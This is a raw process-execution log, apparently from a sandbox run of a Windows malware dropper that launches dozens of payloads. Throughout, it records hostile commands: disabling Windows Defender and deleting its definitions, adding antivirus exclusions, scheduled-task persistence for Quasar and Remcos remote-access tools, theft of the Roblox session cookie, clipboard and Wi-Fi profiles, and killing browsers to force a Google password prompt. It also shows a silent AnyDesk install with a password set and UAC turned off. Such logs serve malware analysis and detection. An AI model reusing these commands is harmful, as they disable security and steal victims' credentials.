C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"
C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 548 -p 3200 -ip 3200
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3200 -s 308
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe
"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"
C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
"C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe
"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"
C:\Windows\SysWOW64\msiexec.exe
msiexec /i vcredist.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4012 -ip 4012
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 1224
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe" && pause
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2080 -s 292
C:\Users\Admin\AppData\Local\Temp\a\jy.exe
"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\is-A3TU6.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A3TU6.tmp\jy.tmp" /SL5="$C0112,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\a\test30.exe
"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4864 -ip 4864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 852
C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5116 -ip 5116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4996 -ip 4996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 1292
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:3
C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe
"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C3B8B64ABBA0A86523A6E16BAE0AF93E
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GpKccFX4bnCh.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe
"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe"
C:\Windows\SYSTEM32\msiexec.exe
msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ouCRXiP71ylE.bat" "
C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe
"C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe"
C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe
"C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6104 -ip 6104
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 1292
C:\Users\Admin\AppData\Local\Temp\a\leto.exe
"C:\Users\Admin\AppData\Local\Temp\a\leto.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 6112 -ip 6112
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 580
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6112 -ip 6112
C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 588
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe
"C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe"
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\ProgramData\Remcos\remcos.exe
"C:\ProgramData\Remcos\remcos.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\1014479001\c7611183bd.exe
"C:\Users\Admin\AppData\Local\Temp\1014479001\c7611183bd.exe"
C:\Users\Admin\AppData\Local\Temp\a\laz.exe
"C:\Users\Admin\AppData\Local\Temp\a\laz.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6245.tmp\6246.tmp\6247.bat C:\Users\Admin\AppData\Local\Temp\a\laz.exe"
C:\Users\Admin\AppData\Local\Temp\1014480001\5b3682fec0.exe
"C:\Users\Admin\AppData\Local\Temp\1014480001\5b3682fec0.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"
C:\Users\Admin\AppData\Local\Temp\1014481001\f903843309.exe
"C:\Users\Admin\AppData\Local\Temp\1014481001\f903843309.exe"
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5096 -ip 5096
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1932 -prefMapHandle 1920 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8ee8605-b83f-47be-9bab-19dfa966a823} 7932 "\\.\pipe\gecko-crash-server-pipe.7932" gpu
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 1280
C:\Users\Admin\AppData\Local\Temp\1014482001\c3b2dc643f.exe
"C:\Users\Admin\AppData\Local\Temp\1014482001\c3b2dc643f.exe"
C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe
"C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AB35.tmp\AB36.tmp\AB37.bat C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"
C:\Users\Admin\AppData\Roaming\AnyDesk.exe
C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe"
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 8248 -ip 8248
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8248 -s 80
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe"
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Users\Admin\AppData\Local\Temp\1014483001\8513e02f5d.exe
"C:\Users\Admin\AppData\Local\Temp\1014483001\8513e02f5d.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe
"C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe"
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 7056 -ip 7056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 776
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Users\Admin\AppData\Local\Temp\1014485001\8541bb3477.exe
"C:\Users\Admin\AppData\Local\Temp\1014485001\8541bb3477.exe"
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"
C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe
"C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe"
C:\Users\Admin\AppData\Local\Temp\a\srtware.exe
"C:\Users\Admin\AppData\Local\Temp\a\srtware.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "
\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe
"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe
"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7200 -ip 7200
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 76
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe
"C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe"
C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe
"C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe
"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
